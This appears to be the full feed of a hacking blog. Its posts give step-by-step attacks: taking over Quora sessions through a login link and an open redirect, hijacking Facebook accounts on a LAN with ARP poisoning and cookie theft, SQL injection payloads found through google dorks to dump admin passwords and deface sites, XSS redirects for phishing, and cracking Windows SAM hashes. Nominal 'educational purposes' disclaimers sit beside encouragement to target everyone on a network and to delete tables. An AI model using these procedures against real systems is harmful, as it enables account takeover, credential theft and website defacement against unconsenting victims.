Latest Entries »

I found this vulnerability last week , and reported it to Quora. They haven’t replied yet, so I am assuming its not a big vulnerability.

Through this method, you will be able to hack and get access to all quora accounts being used on LAN. There is also a URL redirect vulnerability, using which you can spam the walls of the Linked Facebook accounts of the users. So this is how it goes.

As I was using the Android Quora App on my Mobile , I noticed the following. If I go to the profile tab and click on “Inbox”, it takes me to http://www.quora.com/inboxBut before it does that, it first goes to this intermediate link ( Subsequently, I will be  calling this IL ) –

http://www.quora.com/login/android_login?next=http%253A%252F%252Fwww.quora.com%252Finbox&user=[user-id-here]&b=[something-here]

and then goes to http://www.quora.com/inbox/

On further analyzing this link I found that, anyone who had access to this IL, could access my account. So basically, if I give that link to you, you can put it in your browser, and you will be logged into my account – It will not ask you for my login credentials or anything.
The user value is the user id of any user, and the b value is something unique to each logged in session – I am guessing something like a Session ID.

When you login to Quora.com on your browser, there is a cookie called “m-b”. If you take that cookie value and put it into the b value in IL, the link works and it’ll open your inbox. The user value is the user-id of the user. This can be found out by looking at the URL of the Quora profile pic of the user. The URL will be of the form – http://qph.is.quoracdn.net/main-thumb-[user-id]-200-VPN8Lywty7hX4ZM4SkYwlUoiNhmiaLyA.jpeg or something like that.

Vulnerability 1:

If you can get the m-b cookie, you basically have access to the victim’s account. This is a HTTP-Only Cookie. So you cannot access this cookie through Javascript, but you can always sniff out this cookie using Wireshark – as demonstrated in my previous posts about getting the Facebook cookies through Wireshark. So once you get the cookie value, insert it into the IL with the corresponding user-id of the user and you will get access to the account.

Vulnerability 2 :

If you look at the “next” field in the IL, it contains the URL – Doubly Encoded .

Any URL can be Doubly Encoded here – http://meyerweb.com/eric/tools/dencoder/ . Just Encode the URL twice in the above link.

So if you want to Redirect to google.com,the vulnerable link will be

http://www.quora.com/login/android_login?next=http%253A%252F%252Fwww.google.com%252F&user=%5Buser-id here]&b=[mb-cookie value here]

Once the user goes to this link, the page will automatically goto http://www.google.com without any intermediate page.

This is a very serious Vulnerability. There is a URL Redirection happening from a Quora.com to a non Quora domain website. This can be exploited to access the Facebook Access Token of users and further be used to spam the facebook wall of the victim – Via Quora Facebook App. This method has been illustrated very clearly here –  http://blog.prakharprasad.com/2013/06/pwning-facebook-accounts-taking-little.html?m=0 , and hence I would not like to show how to do that here.

Hope this was interesting! I am working on a video demonstrating this whole hack, and will upload it once I find some free time.

Till then. Cheers🙂

This is my new post about Clickjacking ! About a month back there was something like a virus on facebook. It was actually a post which spammed like crazy.

The post was as follows:

This video comes in many forms . One of the other types was that of a video link titled “OMG this is what happened to his daughter“ or some such “catchy” caption. All these spam posts are essentially links which look like videos.The play button is actually an image to imitate the youtube play button. If you view the source code, you can see that it’s just a tag and not a video.

When you click on the play button on the video, it takes you to another website. This website has either of the two following options : In older SPAM posts, a javascript code was displayed, and it persuaded the user to paste the code in the URL to view the video. In newer SPAM posts, There would be a button which read “Click here to verify you are above 18 “.Whenever, the user does any of the above , the code would indirectly “share” the post to all friends. The code essentially imitates the ‘share’ option in facebook.The user is tricked into doing this.

Analyzing this code I can conclude the following. Firstly, the video link shown in the post is actually an image with a hyperlink, not a video Secondly, on clicking the “verify age “ button or pasting the javascript, the user shares the post to all his friends. The technical term given to this type of attack is “ClickJacking”.

This is what Wikipedia has to say about clickjacking😀. Clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. On a clickjacked page, the attackers show a set of dummy buttons, then load another page over it in a transparent layer. The users think that they are clicking the visible buttons, while they are actually performing actions on the hidden page. The hidden page may be an authentic page, and therefore the attackers can trick users into performing actions which the users never intended. There is no way of tracing such actions later, as the user was genuinely authenticated on the other page.

This can be easily found out if one reads through the code of the “verify age” button in the facebook spam. These type of attacks can be put to more deadly uses in bank websites. When a user who has logged in to his bank account visits a website and clicks on a seemingly harmless link, he may actually be transferring money to some other account without his knowledge.

So what are the Ways to prevent clickjacking? As the user of a website, it’s very tough to stay away from clickjacking.You should always keep your eyes open for anything malicious. As a website developer, precautions must be taken to prevent this type of attack. The most common way to prevent this attack is to put a framebuster code in the main page like the following: if(top.location!=self.locaton) { parent.location = self.location; }

If you are interested in developing your own clickjacking page , you can use this tool called the clickjacking tool  It’s really cool! It very easily lets you make a site which has a hidden iframe .

Although many attempts are being made to prevent clickjacking on websites, hackers have been developing newer ways to bypass javascript filters put in place. It finally comes down to the developer/security testing team of the website to be vigilant and constantly update themselves with new types of attacks, thus securing the website.  Feel free to comment .

Hey!

Im back with the second part of the post. At the end of the last post, we successfully re-routed all the traffic from the victim’s computer to the router through our computer.Next, we have to capture their facebook cookies through wireshark. So How do you go about doing that? It’s very simple actually.

  • Open up wireshark
  • Goto capture – > Interfaces in the top menu and select your interface. It’s usually the one which has an IP address and  a certain number of packets flowing through it.
  • Next goto capture and click on start.. It should look something like this

This window has all the packets sent from the victim’s/victims’ computer to the router and all the packets sent from the router to the victim.

Next in the filter type  “http.cookie contains datr”.  You ask why? Because, when a user logs in to facebook, he is given some cookies which is unique to him. If we replace our cookies with the victim’s cookies, we can login to his account as then facebook wont know the difference.

You now have the cookies. To get the information stored in the cookies,  right-click on any one of the cookie and click on Follow TCP stream.

In the TCP stream look for the line  Cookie: ( and all cookie names). If it doesn’t come, select some other packet in wireshark and click on follow tcp stream for that. You can see the source IP and destination IP in wireshark. So if you have more than one source IP , then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

So now you have it😀. The datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. These are the main cookies you need.

Now open firefox and goto http://www.facebook.com. Once there, click on cookies in the web developer add on which you had installed in the last post. Then do the following

  • ·         Clear session cookies
  • ·         Delete domain cookies
  • ·         Delete path cookies.

IMPORTANT: Once you do this, again type http://www.facebook.com in the URL and click enter. Basically you are reloading facebook after deleting all cookies.

Now login to your account with your username and password. After logging in , click on cookies in web developer add-on and click on “view cookie information”.

And there you have all your cookies :p. Now what to do?! I guess you know it by now. !

Click on “edit cookie” for each cookie there and replace the cookie value with the value you got through wireshark.

If you did not get all the  cookies in wireshark its OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.


After replacing all the  cookie values with the ones you got in wireshark, just refresh the facebook page. And thats it! You are in to the victim’s account! You have HACKED a facebook account on LAN.:D

<o.w.n.e.d>  + <p.w.n.e.d>

So until my next post Sayonara and happy hacking!🙂

My blog has 10k hits right now. Glad to see so many people visiting the blog.
Ok so in this post I am going to show you a way you can hack the facebook accounts of all the people who are on your network (LAN or wifi ) . I have tried this and believe me it works..This is really the best way to hack facebook accounts. Its much easier than installing RATs, Keyloggers or making phishing sites. Ok so off we go!

You will need 3 programs for this

Cain and abel : http://www.oxid.it/cain.html
Wireshark : http://www.wireshark.org/download.html
Web developer add-on for firefox : https://addons.mozilla.org/en-US/firefox/addon/web-developer/

So what exactly happens when you type in http://www.facebook.com and login with your username and password. First download the web developer addon for firefox and then login to facebook. After you log in view the cookies in the web developer toolbar.

Ok now if you click on view cookie information, you will be able to see all the cookies which facebook has transmitted to your browser.

The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie..

So your aim must be to get the cookies of your victim through wireshark and then replace your cookies with the victim’s. So then, facebook will think you are the victim as you have his cookies and you will be logged in as the victim. Simple isn’t it?😛

So how do you do this..

First off install cain and abel.It will ask you whether you want to install the packet driver – WinPCap. Go ahead and install that also.Open up cain.

  • Click on configure on top and select your Network card. Mostly its the one with an IP address :p
  • Next click on the start/stop sniffer on top as shown below in green square.
  • Once you start the sniffer, goto the sniffer tab in cain, right-click and click scan mac address as shown below!

Ok now you should have a list of everyone on the network. It may take some time though. You can right-click on any one computer and find out its name.

Now what we are going to do is the actual shit!We are going to do an ARP poison ! What this means is that you fool the router in thinking that you are the victim, and you fool the victim in thinking that you are the router.

So initially victim -> router -> facebook. Now after ARP poison,  victim->hacker->router. This is called an MITM(Man in the middle) attack.You can google it for more info :p

Doing the ARP POISON

  • First Click the APR tab below in cain.
  • Click the white screen in the top frame
  • Click the blue plus on top.

Now you should get a list of all the devices on the left and a blank screen on the right..

In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe its better to target one computer. But if you want some real fun then select all the computers on the right frame😀. Press ok.

WARNING: If there is a person at the router, he can know if you have just done an ARP poison. But where is the fun without the risk.:P

You can try googling on other methods to do arp poison safely.

In the top frame all the computer list should have got filled. now select the whole list and click on the nuclear button (top left of cain).


Thats it you are done with the arp poison. Just be careful, if you select too many computers, your computer cant handle the traffic and the network may just crash. I am reminding you, this should be done for ethical reasons !

Now all the data is passing through your computer. All you have to do is sniff the data in wireshark, get the cookie and replace your cookie with victim’s cookie.

Thats what ill be covering in part 2 of this post . Hopefully in a day or two. Till then Cheers!🙂

What is SQL Injection?

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT,DELETE are used to update information in the database.

In this type of Attack, we make use of a vulnerability where in we supply our own commands to the website’s database and successfully deface it😀 . This vulnerability occurs when the user’s input is not filtered or improperly filtered .

Step 1: Looking for the Vulnerability

www.something.com/news/news.php?id=130

The above code can be vulnerable to SQL injection. The above code is taking the ID as 130 and returning some values. . To see if the URL is vulnerable , put a ‘ at the end of the URL. So try this URL

www.something.com/news/news.php?id=130

Now If you get an error something like it’s not a valid MYSQL statement or something like that, then it is possible to exploit this URL.  Example : When I did it on a website vulnerable to this exploit, I got the following

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

One more thing, if the URL also ends in .php?catid=x , where x is a number, even then you can use this above method to see if the site is vulnerable.

So, now you know if the website is vulnerable or not, but how do you find websites which are vulnerable? Easy ! You use a google dork to do this. So you are going to use google to find websites vulnerable. So type the following in google:

1.  inurl:.php?id=

2. inurl:.php?catid=

So now you will get a list of websites. Test them one by one in the above method mentioned, to see if its vulnerable.

Step 2: Exploiting the vulnerability

This tutorial is only for educational purposes. Kindly do not misuse it.

You have a vulnerable URL

www.something.com/news/news.php?id=130

Ok , Now how do you deface it   ??

Finding number of columns

Now put the following in the url

http://www.something.com/news/news.php?id=130 order by 10–

Now we told the database to order it by 10th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.

Also, the — “are two dashes – -” in the end means “comment”. So anything after this statement is commented off and only our query is put in.

So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .

Find Vulnerable columns

Now we will use union all and select command to find a vulnerable column.Remember to replace that ID number by – that. Like here, I have made it id= -130.

http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–

Since it has 6 columns, we do select all 1,2,3,4,5,6 and a – at the end.

This will give an output . Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables

Now our job is to find the different tables in the database. We do the following:

http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where  table_schema=database() —

Here group_concat(table_name) will give you all the table names in the database. Infromation_schema hold information about the database. So we are just querying from that .

Finding Column names

Similarly get all the columns by simply replacing ‘table’ with ‘column’

http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–

Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.

If this doesn’t work then you can do

http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where  table_name=”some table you got from the previous step”–

Final Step

Now in list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want. Eg username and password columns from tbl_admin table

http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–

Now I just put the column names in the group_concat with 0x3a in between which is ascii for colon and tbl_admin is the table name where these columns are.

Now I got output something like

admin:”encrypted hash”,user2:”encrypted hash”, and so on…

So usernames are  not encrypted here and passwords are encrypted.

So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google😛 .

Defacing

Now you have the admin username and admin password from the previous step.Now you have to find the admin page of the site.

Goto http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.

It will give you the admin page after sometime.

Mine turned out to be  http://www.something.com/admin

So here you get a login box. Put in the username and password of the admin and that’s it. You are in😀

Now do whatever you want, like defacing or deleting tables etc…

There is a reason i have not told you what the something.com is. You can use the google dorks i mentioned to find any vulnerable site.

This tutorial is only for educational purposes. Kindly do not misuse it.I am not responsible for anything .

Any comments/feedback is appreciated.

XSS- Cross Site Scripting

Finally! I have time to write this post. This post is about XSS – Cross Site Scripting..

So what is XSS? It’s basically a way to redirect the user to another webpage without the user knowing about this.

There are 2 types of XSS : Reflective and Stored.

Reflective XSS:

This is the most common type of XSS.In this case the code is not stored on the server-side.

Let me show you a demo of this. Let us assume there exists a web page with a search box in it. Eg http://www.search.com/


Now type anything in the box and look at the URL. If I type “hacking”. The URL becomes as follows:

Now in the URL, you can see q=hacking. Also look at the source code of the green box highlighted above. It is as follows:

<input type=”text” id=”searchbox” value=”hacking”>

Now Suppose this website is vulnerable to XSS , if we make the URL as

http://www.search.com/search?q=”><script>alert(“hacked&#8221;)</script>, The html code of the box would become as follows:

<input type=”text” id=”searchbox” value=””><script>alert(“hacked”)</script>. Now what has happened is that, we have manually closed the input box and written our own script box. So if you give this link to someone then “hacked” would pop up on the screen. This is not very risky as of now. But , What if we change the value to “?<script>document.location(“http://www.yoursite.com&#8221;)</script>

Now when you give this link to someone, they will actually goto http://www.yoursite.com thus fooling the user :p.

The following is a POC- Proof Of Concept.

In this case it is going to goto http://www.yahoo.com even though the URL starts from http://www.google.com. You can also encode the URL so that the user doesn’t see the last part of the URL. You can learn how to do that here : http://pc-help.org/obscure.htm

You can goto http://www.xssed.com and check out the XSS vulnerabilities in all the websites and use it to your advantage.

Eg. you can make one phishing site of GMAIL and you can give the victim a link with http://www.google.com/(link which is vulnerable to XSS) which will re direct the user to your phishing site. The User wont know as he will mostly see the starting part of the URL, thus he is fooled. You can’t use the above link ( given for POC) for your phishing page.:p Guess Why!

Try using some other XSS vulnerability from xssed.com or try finding your own XSS vulnerability on some website.

STORED XSS

In this type of XSS, the Malicious Code is stored on the server. Eg . Take the case of a guest book which takes user input , stores it in database and displays it to other users. If the code is “Buggy” , a hacker can insert a javascript there so that every time any user opens that page, the script is executed, without the user knowing.

Reflective XSS is more common on the internet as the developers are more careful when something is being written to the server database :p

Interesting Info

XSS is a very dangerous vulnerability. Bank Websites take utmost care to see that their code is not vulnerable to XSS as they are the most targeted. Just Imagine if a bank URL re directs to some hacker’s phishing page. All the user’s details are lost!

The best video tutorial of XSS is here:  http://infinityexists.com/videos/episode13/. You can either watch it online or download it.

The toughest part about XSS is finding a vulnerable piece of code and filter evasion. Many sites have code such that malicious code is filtered out from the user input, so the thrill is in finding a way to evade this filter!.

This link is also very good   http://ha.ckers.org/xss.html  , once you get the hang of XSS.

My favourite Exploit of XSS was the MySpace worm created by a teenager Samy Kamkar !.

Samy’s MySpace worm did three silly things: it added Samy to the visitor’s friends list (anyone who visited his profile became his friend) ; it printed “. . . and Samy is my hero” on the bottom of the visitor’s own profile; and it replicated itself to everyone on the visitor’s friends list. You can read about it here  http://namb.la/popular/tech.html

Hacking windows password is very simple. It just takes a little bit of time. But with the proper tools, you can crack it in max 5 mins..

For this to work, you need to have physical access to the computer you are trying to hack into.

Once you get this access the password can be hacked in 2 ways

  1. Using OPHCRACK live cd.
  • First off goto http://ophcrack.sourceforge.net/ and click on Download ophcrack Live CD.
  • Download the correct version of the ISO. If you want to crack Win XP password get “ophcrack XP live CD”, If you want to crack Windows Vista/ Windows 7 get the “ophcrack vista live cd”.
  • Next you have to burn the ISO onto a CD.I recomend using Free easy CD burner from http://download.cnet.com/Free-Easy-CD-DVD-Burner/3000-2646_4-10627009.html. Its fast and efficient.
  • Next, goto the computer you want to crack and pop in the live cd. In the Boot Menu, select the CD option and boot the CD.
  • Now after it loads, it will crack the password and display it to you.

Ophcrack is a very good password cracking software, but if the password is very long or complicated, then it will not be able to crack it.Ophcrack uses rainbow tables (http://en.wikipedia.org/wiki/Rainbow_table )  to crack the passwords. So it is much better than normal brute force

2.Using Cracker such as Cain and Abel. – I personally like this method a lot…

From the computer you want to crack into, you need to get 2 files – The Sam file and The System File. No rebooting and all that.. This is very convenient if you want to hack your friends comp or something :p.

The SAM and SYSTEM file is located in “C:\windows\system32\config”. The problem is that these files are locked and hence cannot be copied.

If you want to crack a Win XP password , then you are in luck as windows also stores the backup of SAM and SYSTEM in

” C:\windows\repair “. So you can copy these files from there…

But if you want to crack  Win Vista/7 password, you have to boot into the computer from the live cd of another OS such as ubuntu, and then copy the SAM and SYSTEM from “C:\windows\system32\config”.

Once you get these files, cracking is very easy.

  • Download Cain and abel from http://www.oxid.it/cain.html.
  • Install it and then run it. Ignore any warnings which come up..
  • Click on the cracker tab on the top. Next click on the BLUE PLUS mark  to add the hashes from SAM and SYSTEM.
  • Click on import hashes from SAM database.
  • For sam filename, click on browse and select the SAM file you have got from the computer you want to crack
  • For the boot key (HEX) select the system file.
  • Now, if all went well, you should be able to see all the users in the SAM database.
  • You can right-click on any username and crack its password.


You can select the right type of cracking by seeing the type in the table (LM or NTLM or both)..

Dictionary attack will try all words from a given wordlist.  Wordlists are plenty and can be searched on Google.

Brute force attack is just crazy , unless the password is very lame..

Cryptanalysis attack is very good and the best type of attack. For this , you will need to download the rainbow tables. Check on google for the rainbow tables. It’s a pretty big file to download. After it completes you can use the cryptanalysis attack with the rainbow tables. There are different rainbow tables available for windows XP and Windows Vista/7. So depending on the OS you want to crack download the correct version. Cheers!

First post !

Welcome to my blog !

I am starting off this blog so that I can dump all the “Information”, (that is lying  in a very disorganized way in  my laptop ) in one place. I also hopefully will reduce the amount of typos i make on the keyboard as the number of posts progress .

All the  Blog posts will mostly be related to Hacking/ Cracking . I hope you guys can learn something from the posts. If you are already  uber or l33t  , then still hang around and comment on the blog posts so that I can improve them.

OK HERE GOES…

I would like to state that all information provided in this blog henceforth should be used for educational purposes only . All the data which will be available for download also must be used in a good sense.. I am in no way responsible, if you decide to use it in the wrong way.

“HACKING SHOULD BE ETHICAL”😛

Follow

Get every new post delivered to your Inbox.

Join 56 other followers